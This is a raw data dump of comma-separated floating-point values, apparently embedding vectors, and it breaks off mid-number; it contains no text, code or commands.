-0.0165109,-0.028624503,-0.0054232324,0.0043907566,0.010914885,0.026216807,0.004146557,0.0027577041,0.02962739,0.041899268,0.022483356,0.01928551,0.02689752,0.01613412,0.0038916823,-0.009375363,-0.007600992,0.019242117,0.03022171,0.002627615,-0.0099612,0.004524134,-0.015691554,-0.015254395,0.0022369393,0.0048452374,0.0075366823,-0.0063500046,0.021201394,-0.01903664,-0.010725908,-0.015582275,0.0028198434,0.008980958,-0.0072108693,-0.009148335,-0.029948637,0.009785409,-0.0004892474,0.023396943,0.018589985,-0.012726599,0.014516653,-0.0070815654,0.00075608,0.0043241195,0.007604032,0.012080193,0.00077684375,0.00091762166,-0.0015258945,-0.019207805,0.027164822,0.01763953,0.008739026,0.017723981,0.0068939966,-0.024361767,-0.0020812403,0.024543455,-0.00018459334,0.006464688,-0.0041593537,-0.0092273345,-0.0019047131,0.011400965,0.005794637,0.01646399,0.024674734,0.0126641765,-0.021183606,-0.0064707384,-0.007050553,0.01592337,0.0071686003,0.0035446414,0.0035133143,0.00878759,-0.0072799004,-0.027052727,-0.0039137607,-0.018381724,0.020987894,0.028367419,0.0017646595,-0.004277614,0.009232164,-0.03359797,-0.01598617,-0.00732497,0.0021399497,0.013110357,-0.0030662064,0.013554322,0.004356559,0.006048294,0.049997237,-0.0116068125,-0.009824406,0.013088926,-0.028382782,-0.0018403151,0.0011610286,0.017717633,0.0000625438,0.031758573,0.036317762,-0.016255276,0.014550242,-0.002791638,-0.000149889,-0.0021105378,-0.0035525924,0.025352849,0.013617052,-0.00158863,-0.012442855,-0.00730972,0.004627103,-0.010245407,0.0031531753,0.007704529,0.00022625344,-0.0024029664,0.015606309,-0.02235962,-0.015057044,0.02194317,0.0053945095,0.010942231,0.013633439,-0.015578745,-0.017755685,0.012754318,0.0024718232,-0.013621533,0.0074499873,-0.0212961,0.0030231941,-0.011985887,0.02170068,-0.032433305,-0.040382497,-0.0019449961,-0.08315265,-0.01296793,0.002921573,0.002787855,0.045257453,-0.013172855,-0.014123967,0.0009655713,0.005549371,0.013787435,-0.003022718,-0.005051069,-0.025577933,0.0044589816,0.05230674,-0.012579868,-0.020137848,0.017079884,-0.0093366755,-0.042109314,-0.0048635723,0.006638004,-0.024491785,-0.009427336,0.024436103,-0.0065245028,-0.017673766,-0.009487336,-0.0032315634,0.0076741646,-0.017549217,-0.01064062,0.008329868,0.011364582,-0.012037689,-0.01240911,0.011257365,0.024037762,-0.028879998,-0.04971327,0.0013265741,0.016848788,-0.0036327012,0.009480146,-0.0189334,0.014264779,-0.02328533,-0.012899588,0.0020257616,-0.0027879535,0.004943286,0.0064874035,-0.020540664,0.031770572,0.0016850854,0.0117200045,-0.0037235522,-0.010960563,0.029667698,0.002624022,-0.025306184,0.008162584,-0.0016295875,-0.00008703066,-0.016542275,-0.00021894743,0.010825006,0.018326743,0.012365863,0.010902464,0.009278797,-0.013533395,-0.008354042,-0.025648598,-0.0008923944,-0.0026080299,0.02285074,-0.010954981,-0.02123619,0.004445211,0.031195221,-0.0067625986,0.0133388145,-0.008017295,0.00897559,0.011895447,-0.008839521,0.00063106464,0.05085667,-0.002213412,-0.02043946,-0.015631761,0.047625523,0.009085982,0.011943464,0.0017435541,-0.008011061,0.022624126,0.0075950674,0.00315587,-0.0027483844,-0.007836968,0.00054851314,-0.01057768,-0.014408467,0.016510839,-0.008531736,0.0034189557,-0.0042700204,-0.019505166,-0.0003859783,0.021619536,0.021858072,0.045338854,0.0069101676,0.002473821,-0.009453488,0.030766293,-0.021633958,-0.018372197,0.0031502424,0.011600617,-0.028389776,0.030990517,0.019430786,0.0025736652,0.010499267,-0.0018505938,-0.0007651582,0.019859254,-0.017138824,0.019448617,0.030253142,0.013819812,-0.014368003,-0.013841939,0.005960987,0.030631697,-0.00034440382,0.03033643,-0.0028155174,-0.013177815,0.011504691,-0.011158875,-0.014759851,0.017759157,0.014654924,0.0045153177,0.0061746733,-0.032921437,-0.0077780285,0.005937784,0.002173195,-0.004034091,-0.006903533,-0.008350115,0.0068642963,-0.0039345343,-0.025262551,-0.010676302,0.005339208,-0.003973831,0.003329132,-0.024015686,-0.034009192,0.003623759,0.01952605,-0.008377993,0.0141547825,-0.0024179409,-0.011398324,-0.0026625537,0.0038865064,-0.004137848,-0.022716897,-0.01875813,0.026726488,0.015288248,-0.016446622,-0.007590852,-0.016128672,0.0040286654,0.0026003006,-0.02757592,0.00893754,-0.01363283,-0.00031461593,-0.0020856897,0.018643752,0.0071535455,0.008287923,0.00021432013,-0.0215772,-0.029418457,-0.02295126,-0.0128284525,0.003157356,-0.002683144,0.0059070787,0.00092177757,0.007284081,0.008213463,-0.025933523,0.02830176,0.029615216,0.009855111,-0.0076980907,0.012477278,-0.0035925072,0.024410274,-0.0032527563,-0.00061437517,0.020787094,0.083887264,0.007244829,-0.0060624615,-0.012701977,0.026317192,0.0038242473,0.006837286,-0.009106887,-0.0026302345,0.0091579165,0.027608445,-0.007184999,0.006592359,-0.0070527717,-0.008189005,0.0229722,0.013985533,-0.025439763,0.0180738,0.0076116985,0.012885939,-0.018217212,-0.009317555,-0.02922461,-0.016838249,-0.043274496,0.024259735,0.03428617,0.0030390604,0.025850214,-0.0017883605,-0.006376894,0.013065887,-0.000058668757,-0.01741423,0.008590732,0.00995595,-0.018076526,-0.011275796,-0.011842703,0.010678448,-0.0022532179,-0.006964768,-0.029233243,-0.024817042,-0.024643688,-0.009839761,-0.0033698585,-0.012964832,-0.0038808456,-0.015804367,0.0036854127,0.019007305,-0.004950577,0.0051172744,-0.03226762,0.005926544,0.019134453,-0.012922817,-0.018825652,0.019885695,0.010034918,0.005569819,-0.02134295,0.009072256,0.014000912,-0.021554317,-0.0038657268,-0.007963417,-0.018781856,0.015581851,-0.014195366,0.0019826838,-0.012646295,-0.0076222704,0.0036314512,-0.0077653006,0.00017259739,0.026452493,0.002698211,0.0044501596,-0.00043246447,0.010436526,0.012130369,0.01610911,0.019003581,-0.003232737,0.0006390498,-0.009685854,-0.012693633,-0.0029081015,0.023320038,0.018688112,0.01326863,0.0052248086,-0.01567829,-0.0021358067,-0.0037607548,0.0015390601,-0.016242152,-0.025144827,-0.010770726,-0.006528476,0.015645558,0.01759674,0.013977911,-0.0047555375,0.0024609794,-0.008300545,0.004006725,-0.0042427173,0.0139618665,-0.0028679848,0.017945997,-0.0089136865,0.043907497,-0.017156195,-0.0053675924,0.030473243,-0.024799677,-0.009107185,0.021313777,-0.0006684551,0.03715568,0.020052135,-0.012688741,-0.0058291135,0.0012871561,0.0030465685,0.000944793,0.0011513362,-0.022300249,0.028026218,0.040555283,-0.008405245,-0.008366,0.02621207,-0.009440939,0.024269402,-0.009720905,0.013243132,-0.022080667,-0.01634037,-0.019078098,-0.0032694114,-0.03167974,0.031852156,0.0127045,0.016497541,-0.015202717,0.0053316914,0.023391545,-0.014874764,-0.00042462867,-0.014314132,-0.014384444,-0.000014870459,0.020015225,-0.017775621,-0.017244313,0.010964021,-0.0044582263,-0.007162046,-0.066565365,0.026069907,0.009090121,0.01493529,0.00014744322,0.003847653,-0.008278673,-0.018704146,-0.008234271,-0.004731859,0.0023414677,-0.0010383801,0.020968482,0.0102821775,0.017843077,-0.011519235,-0.002619436,0.0061915996,0.012802366,-0.017637886,0.005853205,0.01881573,-0.017248863,0.014569369,-0.01744439,-0.028541606,0.047475234,-0.0027119562,0.0061671385,-0.00009662461,0.013009163,-0.017215064,0.014253468,-0.0333545,0.04465595,-0.028912678,-0.034654137,-0.0014686325,0.0121516185,0.010497368,-0.008510747,0.0053591067,-0.0128051955,-0.003119051,-0.017913856,0.004727804,-0.01632537,-0.0035354197,-0.0016908165,-0.0036712112,-0.037149504,-0.00033717518,-0.0007497356,0.0060584163,-0.019999014,0.0002272007,-0.009223977,0.0048562596,0.035716377,0.00088594476,-0.0076942113,-0.014362406,0.006147017,-0.0039789155,-0.0035114216,0.012114274,-0.024500903,-0.031924367,0.0034022487,0.012180217,0.00077503885,-0.010727597,0.020344542,0.019457107,0.0188376,-0.010510505,-0.0016818813,-0.017363794,-0.0072081815,0.01800506,-0.0088395905,-0.028484467,-0.003200786,-0.00014061623,-0.015600014,0.008950793,-0.002143841,-0.034349147,-0.0016938819,-0.0019101123,-0.02111005,-0.011451338,-0.0055538192,-0.0073365183,0.026475864,0.0014980781,-0.015943486,0.008018393,0.040274832,-0.020188889,-0.0043017454,-0.013128047,-0.006711907,0.005590689,-0.025088096,-0.011142132,0.015525503,-0.01575317,0.0046705776,-0.003956961,0.017139453,0.029401673,0.0012475752,-0.0029472883,-0.0016538778,0.0031892364,-0.008006093,0.0042159026,-0.0093325665,-0.0004479758,-0.029429037,-0.015240702,-0.007320537,-0.016415184,0.008325338,0.058948077,-0.043478344,-0.0033560276,0.021141931,0.015039426,-0.04003209,0.029304944,0.004582394,-0.027701851,-0.017255154,0.00871021,-0.0038170666,-0.012421198,-0.02358231,0.0055946875,0.0074746283,-0.0064242696,-0.0039467914,0.0031458826,-0.01867936,-0.017539075,0.008597913,-0.0048094545,0.0038070786,-0.013454024,-0.015661221,-0.0012505346,-0.023825947,0.024606718,0.005809358,0.010896039,0.005682334,0.025673928,-0.017445518,-0.015267531,0.02084775,-0.0084639145,0.030852782,0.0017859576,-0.023344062,-0.023904037,-0.007807915,-0.0059786914,0.016333267,0.015997512,-0.0054410603,-0.018014623,0.011602451,-0.008102989,0.113042474,-0.018217193,-0.0024819153,0.010602747,-0.0009112326,-0.008514869,0.014380322,0.019472629,0.029786667,0.012807407,0.0059247464,-0.014774002,0.008666184,0.03345904,-0.0009528941,-0.007717274,0.016038219,0.12279946,-0.0129352175,0.02954942,0.000361291,-0.0018492758,0.0024817856,0.0037510328,0.023058245,-0.07549695,0.007410718,-0.025888827,-0.006163905,-0.009742448,-0.028989255,0.0014453826,-0.0043895463,0.009765934,-0.0026756509,0.015434412,0.0014991332,-0.0018148781,-0.035172146,-0.011245301,0.014061265,0.00022535646,-0.010735987,0.012997794,-0.03256804,0.0047846045,-0.022282252,0.011825906,-0.0061711757,0.008730935,0.0070369686,-0.012785192,0.034208603,0.009872606,0.016921125,-0.0019599916,0.01185741,0.0047028046,-0.016864682,0.027338488,0.011726857,0.007305134,0.003521376,0.030235756,-0.024999235,-0.0007158361,-0.018701758,0.012363105,0.008667346,0.013329831,0.011575828,0.02857003,-0.012373849,-0.0068868203,0.051373035,-0.0006614215,0.008027322,-0.0061026467,0.022689063,0.005339855,0.043544576,0.008527312,-0.0039546094,-0.0071929996,0.008118885,0.009451429,0.004673018,0.03776254,0.013099388,-0.015788166,-0.012849389,0.00611681,-0.010288549,0.024040384,0.033870824,0.028917432,0.009067142,-0.005580891,0.006668391,-0.019377615,0.012143888,0.044675175,-0.0024623277,-0.0008761583,-0.007125498,0.02206179,-0.0040509333,-0.032952834,-0.00008447583,0.0006847186,0.007342668,0.013812719,-0.024037952,0.014634773,-0.012113448,-0.0073887086,-0.0073015103,-0.0065960353,-0.032380626,-0.018017624,0.018544985,-0.0074336533,-0.0010135237,0.011454409,-0.020194368,-0.0010962429,0.013869269,0.01582641,-0.01811281,-0.008186177,-0.02412117,0.0057977457,0.016570738,0.04303311,0.011895065,-0.02000399,0.02025649,-0.03704338,-0.029218407,-0.018041844,0.0195347,0.0027219283,0.011928063,0.012896567,-0.018543687,0.0036218876,0.022324337,-0.0078079533],[-0.009890981,-0.0011436702,-0.012959796,-0.020215629,-0.009010476,-0.029743502,-0.01429794,0.014751121,-0.0014653171,-0.017657375,-0.020861577,0.039550595,-0.0005721174,-0.010142376,-0.012264582,-0.0012508386,0.017059762,0.006145358,-0.0059238854,0.010150704,0.0151276095,0.005370242,0.00688378,0.0011115599,0.011617772,-0.00721106,0.0016965638,-0.007509598,-0.010106059,0.015410932,-0.002993456,0.04097317,0.007335364,-0.0025578197,0.029520502,-0.010720133,-0.008500915,-0.03203099,0.0010188951,-0.007674542,-0.005694719,0.011150303,-0.0082303025,0.041002862,-0.0032560227,0.002966957,-0.0016008498,0.017156675,-0.027215298,-0.004940735,-0.0062111495,0.0037439663,-0.014175057,0.019103069,-0.016919594,0.028370207,-0.008943314,-0.026276132,-0.009420654,0.004195586,-0.011123508,-0.0062993458,-0.004585355,-0.01666951,0.041259915,0.0011776218,-0.003936508,-0.0016622663,0.0028149574,-0.021864392,-0.0047736745,-0.014529596,-0.0065915296,0.0053495285,0.014714855,0.028437348,-0.0058685886,-0.016751958,-0.014531279,0.004338643,-0.0060674543,0.01785458,-0.0066673676,-0.0058838194,0.012161966,-0.00030197593,-0.01460505,0.008415046,0.00007939737,-0.028012235,-0.008520429,0.012301915,0.01077023,0.009203605,-0.0054451595,0.01911503,0.011732003,-0.016907495,-0.0075371563,0.019006848,-0.017291501,-0.005785416,-0.034628887,0.013871114,0.010721749,-0.022029411,0.00684142,-0.024579216,0.011184128,-0.0023232189,0.00041210692,0.006929555,0.011236223,0.0028846266,-0.0031359056,-0.0011146972,-0.011556622,0.014090387,-0.010410142,0.022790974,-0.011493316,0.029845756,0.001424281,-0.004455867,-0.011107473,-0.0012333203,0.0011616257,0.016663684,0.0068559353,0.004770355,-0.005828934,0.013395554,0.006083202,-0.021080282,-0.010542064,0.0044711796,0.010549534,-0.011998402,0.00076079473,-0.02594385,0.011067039,-0.017226048,-0.0039101667,0.017275877,0.017936338,0.014886989,0.0038896613,0.0174085,0.0148216905,-0.009829837,0.012468815,0.0003511869,-0.01528596,-0.027221495,0.0048132977,0.020283656,0.011247963,-0.014051886,-0.028925225,-0.008448228,-0.019137014,0.016476471,0.013557496,-0.01998668,-0.018039474,-0.05027823,0.013080626,-0.019705564,-0.025678897,0.009122062,0.03072794,0.01051996,0.01923916,0.009446737,0.012851079,0.025732912,-0.007636633,-0.011585713,0.009728657,-0.0023612347,0.022668753,0.0076314094,-0.018843642,-0.009604528,0.004058289,0.019834343,0.02391245,-0.014834333,-0.024231985,-0.004053776,0.005063439,-0.02688217,-0.00015500003,0.0012384546,-0.020418,-0.008495901,-0.0035224324,0.10283504,0.015414503,-0.0022514325,-0.022559969,0.003783219,0.012134443,-0.0150032155,-0.0058641573,-0.014339566,-0.0074698525,-0.017868705,0.013562913,-0.008702489,0.0068141124,0.013249005,-0.011360656,0.017661164,0.004596592,-0.05439451,0.025669629,0.023549395,0.0069072596,0.0096489815,-0.018787522,0.014175538,0.00798746,-0.027619105,-0.018952008,-0.035740018,0.0027160095,0.0072223325,0.017405396,-0.03034149,0.024023296,0.006082061,-0.032041322,-0.024463259,-0.004540018,0.0056880517,0.010981327,-0.023094924,-0.001944089,-0.002748357,-0.002087151,0.0052614175,0.019263847,0.043159895,-0.017919252,-0.008987139,0.011945162,0.0053279554,-0.01899376,0.02883672,0.017867835,-0.012448529,0.008325921,0.019308072,-0.007640742,-0.024855327,-0.0016484369,-0.011448783,0.0090183215,0.003516869,0.023477677,0.020771835,-0.005209983,0.011077538,0.038349524,0.0063773454,0.019826526,-0.044561394,0.000853218,-0.0003112003,-0.024410974,0.011180219,-0.0044954456,-0.0008266053,0.0016501391,-0.010026532,-0.002966443,0.0024422053,0.0075765606,0.0012873883,-0.0059428653,0.0009027501,0.004183202,-0.020403165,-0.01909727,-0.00031599385,-0.010026772,0.008514612,0.038380317,-0.007501334,0.0010675484,-0.011513411,0.017827094,0.006401611,-0.019338546,-0.023246702,-0.01768608,0.027171418,0.010999227,-0.031134844,0.017677888,-0.019105013,0.019876078,-0.004918859,-0.015105824,-0.00959573,0.0005615967,0.036426112,-0.03230077,0.032054797,-0.035091646,-0.016665518,-0.02730509,-0.008915009,-0.00020205103,-0.026129896,-0.0007198629,-0.016438205,0.00077300105,0.011690726,0.020704808,-0.015209502,0.0011361112,-0.024312077,-0.03332021,-0.0039580227,-0.018282034,-0.0020655028,0.0073122242,0.009368549,0.013269185,0.009129879,0.018517187,0.019693192,-0.005107117,0.023268413,-0.00804998,0.010414288,0.001214642,0.014606144,-0.01506999,-0.0059658773,-0.011886054,-0.0007405408,-0.0016327582,-0.008521209,-0.01102651,0.006974228,0.008302027,-0.0050338116,0.025168566,-0.00026110967,-0.0047641485,-0.0038912697,0.0051428406,0.01336425,0.000011456466,-0.01190851,0.010378419,-0.016146462,0.021787014,-0.008599525,-0.013397034,0.008946133,0.06933834,-0.0071263732,-0.01384098,-0.003243199,-0.029399784,-0.009303523,0.029120531,0.028104704,0.0011770506,-0.007843538,-0.015246705,-0.033705913,0.002543604,0.0069698715,-0.021161946,0.01933371,-0.014414175,-0.019857464,-0.0303686,-0.006898432,0.01817093,-0.010862128,0.016111573,0.016610747,0.013496221,0.036519475,-0.0015349643,0.006136048,-0.00062248675,-0.026484098,-0.009671039,-0.007108085,-0.00078031066,0.010208578,-0.037468404,0.020539183,0.014929802,0.0104827145,-0.01964787,-0.023824101,-0.0052959644,0.017639603,0.0013311114,-0.032017056,-0.0066584703,0.037024036,0.0049303025,-0.015712306,-0.00027767793,0.0060730563,-0.0073871543,0.035509076,-0.025167033,0.0051122922,-0.00643776,0.009202856,0.017455375,-0.038100358,0.042425416,0.020389948,0.014201687,0.019040987,-0.010843526,-0.0004934412,0.007496117,0.039035596,-0.008872931,-0.019251958,-0.0019519291,-0.0070085945,0.015550725,0.010459877,-0.010119285,0.004503737,-0.0014902839,0.011492106,0.008345535,0.0068971864,0.014603923,0.012039553,-0.014986513,0.0033817864,0.011454449,-0.0064579216,0.0029773032,0.0058377003,0.008230858,-0.016513146,0.014696097,-0.009504588,-0.00092765945,0.0016274867,-0.006333991,0.009970832,0.020397501,0.030843286,0.028848913,0.026128216,-0.003838618,0.011661199,0.0149183115,0.0010941231,-0.0041013737,-0.006076357,0.004888627,-0.00020130449,0.010108917,0.0017894752,0.0059618982,0.043789063,-0.008879587,0.006555882,0.023094637,-0.015613399,0.0013446006,-0.019821523,-0.0142612895,-0.007084839,-0.0105800005,-0.011078041,0.026742999,-0.006803906,0.0025952233,0.002741405,0.0006166631,-0.0054268083,0.0026737854,-0.005292289,0.010856896,0.017284647,0.006798793,0.03963216,-0.0027855006,-0.026914097,0.015364485,0.011321719,-0.013869777,-0.023300774,0.034425914,-0.0008821922,0.031999238,0.012714231,0.03467883,-0.014797978,0.0034447014,0.025760138,0.03873477,0.0065343534,-0.032644186,0.00085684477,-0.0063223015,0.00062085787,-0.005961799,-0.0137407975,-0.008867742,-0.00036556082,0.028478436,-0.0123262545,-0.0060734637,0.0061989003,0.030214328,-0.0109277675,0.0060490156,0.009613333,-0.01615962,0.03710425,0.0014633599,0.05995635,-0.02323272,-0.01516579,-0.010151315,0.012756032,0.014170427,-0.02099637,0.020953065,-0.035684638,0.018805701,0.010731174,0.024563799,0.007947341,0.021924973,-0.010201935,-0.001070918,0.005111685,-0.012365876,-0.011099694,-0.0043168114,-0.0011446202,-0.008853893,-0.012954272,-0.02862318,-0.017797837,0.011381038,0.029353684,0.0082718395,-0.01850643,0.0015709972,-0.022427594,-0.000051404408,0.019718261,0.0002477032,0.016898211,0.0010779109,0.016967261,0.0146760605,-0.015587891,0.029833773,-0.00008905498,-0.0068501504,0.002568096,0.023044813,0.011290457,-0.029016709,0.014316327,0.005920159,0.019491531,-0.012244662,-0.021922538,0.020372406,0.027020613,0.006696869,-0.016791098,0.0008786381,0.014948076,0.0058244485,-0.01793221,0.014851289,-0.0127991745,-0.010203328,-0.008909401,-0.008336586,-0.016621497,-0.00006250214,0.0016786882,-0.011470323,-0.018461043,-0.017334012,-0.007962447,0.015922597,-0.012627358,-0.017246073,0.02653477,0.013401988,-0.012720033,0.026829422,0.009673203,-0.015403151,-0.0039340258,0.01726462,-0.00050807436,-0.00070421014,0.008115526,0.016964504,-0.0053969063,-0.018025441,0.0114568975,-0.0039132037,0.013900096,-0.021075837,0.012109458,-0.0050892667,0.004376326,0.025664767,-0.004565728,-0.024730952,-0.0059989486,0.0144115025,-0.04387727,-0.0039493446,-0.008402228,0.038777247,-0.017711274,-0.0033826677,-0.003719584,0.00014262593,0.008638149,-0.026932592,0.013709828,-0.038845666,-0.00048002834,0.023355747,0.0026281998,-0.009276134,0.037364554,0.017702203,-0.000589668,0.0023559795,0.0070786034,-0.005857565,0.010752152,-0.010323454,0.012664567,-0.0008073473,0.017233955,-0.033317808,-0.0247682,-0.029409721,-0.03657364,-0.022958094,0.044190735,0.009373069,0.0016551228,-0.0005218383,0.011722532,-0.011576009,-0.014019222,0.00090788875,-0.048164066,-0.00038460965,0.009511022,-0.012838895,0.023382012,-0.0010548054,0.00815469,-0.013807866,-0.014571116,-0.01398678,0.007837564,0.0048660245,-0.024633193,-0.0038407499,0.024432942,-0.008545983,0.022550805,-0.014653561,0.010504535,-0.0018135577,0.0478228,0.02715758,0.0162803,-0.0077237906,0.019440671,-0.0007406897,0.0061230743,0.012436537,0.017822847,-0.00034349936,0.005998992,0.0070756436,-0.007955552,-0.014266526,-0.013417465,0.013015747,0.027022606,0.03171093,-0.00029432087,0.018255152,-0.013485039,0.027585246,-0.0056304443,0.006225319,-0.00426536,0.029238807,0.01771048,0.0022262267,0.029944345,0.013806994,-0.0065143215,-0.023025526,-0.013990773,-0.025877412,0.01811496,0.0148360375,-0.0014178181,0.014958527,0.0071466574,0.012532469,0.0059458646,0.005218267,-0.003886549,-0.0028016341,-0.027752215,-0.0042494712,-0.016207116,0.006120836,-0.04241095,0.0011344553,0.011678187,0.012584333,0.0019385105,-0.009720582,-0.010527355,0.013546185,-0.008543144,-0.04440586,-0.01989254,-0.01375211,0.022154322,-0.036012936,0.013025477,0.016769512,0.01294845,0.0051014605,0.015199003,-0.018317478,-0.01154351,0.00035926653,-0.01002112,0.01761164,-0.0005585702,0.009325653,0.0015562737,0.0012272509,-0.0038950853,-0.013942188,-0.009103244,-0.008839235,-0.021180743,0.02015485,-0.004379932,-0.000027875145,-0.010734228,-0.024424346,-0.019356057,0.016013661,-0.046121467,-0.022455653,-0.004090536,0.015233996,-0.019216256,0.032485377,-0.0118794,0.019929541,0.028554095,-0.008100452,0.004347356,-0.0052213767,-0.0044318177,0.02811922,0.031201396,0.0034679498,-0.033831727,-0.013184257,0.0035306057,-0.012998068,0.00018119307,0.0016461752,-0.019789424,-0.01844782,-0.028003605,-0.0002590834,-0.027995218,0.009157852,-0.0015974145,-0.012186564,0.030937724,-0.009794539,0.016481834,0.016182484,0.016495729,0.005055187,-0.006898141,0.0219849,-0.040524654,-0.025291957,0.008650397,-0.011412022,0.018607311,0.026151525,-0.02789443,-0.018098714,-0.031582497,-0.007483976,-0.013389419,0.022378325,0.009011153,-0.02274022,-0.0150500415,0.02893092,0.0045405566,0.009368403,-0.02088015,0.0006266373,-0.012391924,0.0061859586,0.004156371,0.0142552825,-0.033373788,0.020585034,0.0027433704,-0.009281537,0.024681835,0.010956844,0.0037168388,-0.00083308044,0.014946456,0.0055709127,-0.024219843,0.042383205,-0.010272906,0.0044129724,0.036738105,-0.008095645,0.0037479522,-0.0024950623,-0.015014434,-0.02409004,-0.006121865,0.017013619,-0.01804413,0.009359239,-0.0036527445,0.007962076,-0.0015123056,0.016511466,0.025178766,-0.008709476,-0.016053965,0.036412846,0.008393037,-0.032134637,-0.015250229,0.011084146,-0.0020094002,-0.0021925638,0.014149087,-0.0022453566,0.0043271417,0.03180911,-0.020104237,-0.023278391,0.023968237,-0.017495472,0.00096491585,0.03066434,0.012578322,-0.0070521096,-0.007910952,0.017006936,-0.04761182,0.006445486,-0.008031058,-0.0086249355,0.013414151,-0.022767836,-0.0004898439,0.015225448,0.0044042845,0.016457662,0.005605663,0.0061629503,-0.004109613,0.022976913,-0.01794242,0.012686638,0.012262843,-0.010075743,0.004528691,-0.0007670166,-0.0049803257,-0.012204881,0.022392407,0.000259094,0.0021487316,0.015084237,0.00009999,-0.0034216216,-0.0023282617,-0.024249334,0.012953889,0.030763676,-0.013748969,0.019141737,-0.027039496,-0.025773756,0.0020033626,-0.0037134183,-0.023397515,-0.005618844,-0.0033002142,0.015609007,-0.019506155,-0.013354228,-0.01602953,-0.052785125,0.02169207,-0.03254525,-0.011270936,0.0043485924,0.0032142156,0.005012386,0.01304786,0.044572223,-0.01222652,0.0041849553,0.009644349,0.01897897,0.0068843043,0.0075095454,-0.0038578268,-0.014048016,0.017560733,0.042456184,0.0049824584,-0.0066178143,-0.022487545,0.015185836,0.014294741,0.029706988,0.0014312776,-0.014591705,-0.0025971904,-0.025988046,0.018887682,-0.004278144,0.0160766,0.01023283,-0.013203876,-0.01611997,0.00042262668,0.0019171225,0.0037266668,-0.0107456185,0.013908311,0.0029036393,0.00025551923,0.0061443406,0.012048658,-0.0088186255,-0.027597092,0.007680002,-0.0071433005,-0.0022363546,-0.0006569881,0.035195645,-0.001405286,0.003873078,0.0052929446,-0.004238442,0.033898067,-0.0043624598,0.011678784,0.019219477,-0.0059422096,0.0052838963,-0.006211295,0.008404673,0.006746045,-0.029045772,-0.013700875,-0.010045719,0.032617487,-0.009279669,0.0050858473,-0.007194627,-0.01226026,-0.022539258,0.004361308,-0.022410352,0.021961186,-0.007551251,-0.014300787,-0.0029142483,-0.019657316,-0.0044329846,0.023577519,-0.023261618,-0.0016506215,-0.030559996,-0.023447154,0.0022068152,-0.0016048149,-0.00016730781,-0.006345105,0.0073532304,-0.0063059162,-0.0047724866,0.01949147,0.016231274,0.023371302,0.016711077,-0.014115776,0.0032832914,-0.013378703,0.026027134,-0.0032102452,-0.0004931478,0.060024533,-0.0016689127,0.0010779718,0.005513986,0.0043001184,0.035080988,0.013042251,-0.0025842288,0.036207017,0.00087165105,0.014801284,0.019919822,0.00527634,-0.009693724,0.022082653,0.024137504,0.027998434,0.008405592,-0.00060405023,0.028892497,0.0099976715,0.016034896,0.008853481,0.00028237127,-0.008629464,-0.022334121,-0.011269997,0.0001058131,0.025584232,0.0029955043,-0.02195012,0.009606296,0.022061363,0.004742715,-0.03422726,-0.009619724,-0.00035294853,-0.019591156,-0.01314832,-0.0071488214,0.0051386817,-0.00075420446,-0.032057796,-0.0041621337,-0.0024377014,-0.00998319,0.0074878684,-0.0027986104,0.019314889,0.0010595694,0.006225176,-0.00080590526,0.00047426863,-0.00636126,-0.02227205,-0.004931244,0.009106493,-0.0007637262,-0.012476475,-0.013203882,0.0034383081,-0.027685706,0.024987098,-0.0124088125,-0.01483634,-0.0018198657,-0.017552556,0.0042195353,0.0023755096,-0.010978787,0.01685861,0.0107800225,-0.011346985,0.02859416,0.011643762,0.00021582053,0.014398557,0.002573399,0.04316172,0.019354487,-0.013801248,0.0071587446,-0.004063495,-0.010512189,-0.013851544,-0.0020360923,-0.03332775,-0.015450755,-0.010532607,0.01738221,0.009748573,-0.014590855,0.02350596,-0.018066082,0.022292955,0.0044154637,-0.019020382,0.00095015304,0.029943809,0.0025921476,0.0166529,-0.0091277985,0.026719237,-0.001587797,-0.0485958,-0.0025670966,-0.008424398,0.0027945717,-0.0071938536,0.015413177,-0.0060605723,-0.01820653,-0.0031874042,-0.017431946,-0.0012789031,0.022935718,-0.008241338,0.0014519753,0.022093516,0.0029610596,-0.01296842,-0.0009887173,-0.008383263,0.005256337,0.0103813335,-0.0008846241,-0.0033766204,0.035051294,-0.018166497,0.020909315,0.021493683,-0.0219194,-0.011701511,-0.011325565,-0.007901119,-0.02099519,0.00403333,0.013288035,0.0040171403,0.016807072,-0.013719629,-0.010130128,0.027836444,-0.018519018,0.0062418683,0.0005047236,0.034708817,-0.019387176,-0.0038011512,0.022161134,0.0057889908,-0.015299602,-0.013063694,-0.023620442,-0.004998302,-0.014854334,-0.012690475,-0.015748532,-0.003919216,-0.015233938,0.014191692,-0.014473557,0.019894263,-0.019909032,0.0015406652,0.020631116,-0.0048632813,0.0041733454,-0.009780027,0.0015658143,0.024832496,0.007702186,0.008567227,-0.013460409,-0.007829772,0.017994655,0.010228638,0.02007137,-0.0023340525,-0.0012808936,-0.020707503,0.013650847,0.01928728,0.010638591,-0.0137428455,0.035798848,0.004125259,-0.012097508,-0.02796795,0.0053220266,0.009851884,0.008601614,-0.015745265,-0.01951769,-0.001492474,-0.007839678,-0.01714735,0.07958061,-0.0051721423,0.005546175,0.0027161532,0.021078518,-0.02793626,0.011639851,0.010224215,0.013029477,-0.001739508,-0.036691986,-0.02380268,-0.012475965,0.0045122947,0.002883723,-0.025743516,0.0055779694,-0.0012427624,0.0018866716,0.016233843,0.0026354115,-0.0034550447,0.01579639,0.001420365,0.0076458794,0.017254455,0.021298317,-0.018935611,0.02103513,0.0031566117,0.0021033634,-0.030952437,0.010735932,0.018020894,-0.012715609,-0.0030084571,0.0017649842,-0.02149742,-0.02289579,0.011275558,0.010161656,-0.012895058,0.03513523,0.0052054543,0.016787663,-0.015291418,-0.025039792,-0.0004858544,-0.0027948797,-0.008891631,0.018232904,0.0036818176,-0.00447697,0.021025058,-0.014572194,0.008844414,0.00816588,0.020877961,0.021811415,-0.006655793,0.013302264,0.022721756,0.0044315094,-0.0072414805,-0.018155405,-0.013698844,-0.015235471,-0.009540316,0.021595577,-0.040803317,0.017680146,-0.0015903583,0.01798883,0.0011804751,0.006596662,0.00023976134,0.011992453,-0.009415349,-0.009311515,-0.025111917,-0.0021699283,-0.0019263185,0.021488262,0.0037521555,-0.02069246,0.0024660819,0.00086811953,0.0037769442,0.059490442,0.014318967,0.02172347,0.012037602,0.0005694894,0.025628814,0.02769997,0.020771943,-0.0013053669,-0.0017078386,0.0029690028,0.015491983,0.0030016666,0.0075807967,0.024334587,-0.022419734,0.0120883025,-0.0133719435,0.011467486,-0.013317845,0.0039223614,0.041031457,0.0070926934,0.020426843,0.0011558166,0.014026942,0.010734583,-0.0012158472,0.020719597,-0.021350577,-0.011950859,0.016155211,0.016003245,0.0010111842,-0.009769203,-0.053086102,0.003648682,0.12095484,-0.00052065385,-0.005000327,0.019329168,-0.0050135716,0.0